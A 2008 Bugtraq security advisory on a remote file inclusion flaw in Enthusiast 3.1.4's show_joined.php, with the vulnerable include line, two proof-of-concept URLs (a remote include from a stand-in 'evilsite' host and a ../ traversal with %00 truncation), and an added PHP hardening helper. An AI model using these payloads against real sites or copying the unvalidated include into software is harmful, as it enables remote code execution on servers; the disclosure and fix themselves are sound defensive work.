Message-ID: <20081108100225.daw3izgzg0skck0g@mail.amnpardaz.com>
Date: Sat, 08 Nov 2008 10:02:25 +0330
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Subject: Enthusiast 3 Remote Code Execution

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: Enthusiast 3 Remote Code Execution
# Vendor: http://scripts.indisguise.org/enthusiast/
# Bug: File Inclusion
# Vulnerable Version: 3.1.4 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_57.htm
###################################################################


####################
- Description:
####################

Enthusiast is a full-featured member listing collective management
script. It is geared towards fanlisting owners who own multiple
fanlistings, but easily customizable for other types of listings as
well - cliques, physical listings, taboo listings, and the like.


####################
- Vulnerability:
####################

+--> File Inclusion

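show_joined.php builds an include target from the variable $path. When
register_globals is enabled, a request parameter named path sets that
variable, so it is possible to include arbitrary files from local or
remote resources.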

####################
- Code Snippet:
####################
/show_joined.php #line:261-264

<p class="show_joined_credits">
<a href="http://scripts.indisguise.org">Powered by Enthusiast
<?php include $path . 'show_enthversion.php' ?></a>
</p>

####################
- Exploits/POCs:
####################

POC:
http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/
(this one includes show_enthversion.php from evilsite)
POC:
http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00
(this requires magic_quotes_gpc to be disabled)

####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.comz
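
A hardened form of the include shown in the code snippet above, as an added example that is not part of the advisory or of Enthusiast's code. The helper name resolve_include() and the assumption that show_enthversion.php sits in the same directory as show_joined.php are hypothetical.

```php
<?php
// Added example; not Enthusiast code. resolve_include() is a hypothetical helper.

// Vulnerable pattern from the advisory (show_joined.php): per the advisory,
// with register_globals enabled a ?path=... parameter sets $path.
//     include $path . 'show_enthversion.php';

/**
 * Return the absolute path of $file inside $baseDir, or false if the name
 * carries a NUL byte, a URL scheme, or resolves outside $baseDir.
 */
function resolve_include($baseDir, $file)
{
    if (!is_string($file) || strpos($file, "\0") !== false) {
        return false;                       // NUL truncation (the %00 case)
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file)) {
        return false;                       // http://, ftp://, php://, data: ...
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $full === false) {
        return false;                       // missing directory or file
    }
    // The resolved file must sit under the base directory (blocks ../ escapes).
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : false;
}

// Fixed form of the include: the directory is set by the script itself, so
// a request parameter named "path" no longer has any effect.
//     $path = dirname(__FILE__) . DIRECTORY_SEPARATOR;
//     $target = resolve_include($path, 'show_enthversion.php');
//     if ($target !== false) { include $target; }

// Constructed inputs: one legitimate name and the two shapes from the advisory.
$samples = array(
    basename(__FILE__),                     // exists next to this script
    'http://evilsite/show_enthversion.php',
    "../../evilscript.php\0show_enthversion.php",
);
foreach ($samples as $s) {
    $ok = resolve_include(dirname(__FILE__), $s);
    printf("%-45s %s\n", addcslashes($s, "\0"), $ok === false ? 'rejected' : 'accepted');
}
```

Setting register_globals to Off in php.ini removes the precondition the advisory names; the helper covers the case where the include directory still comes from a variable.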

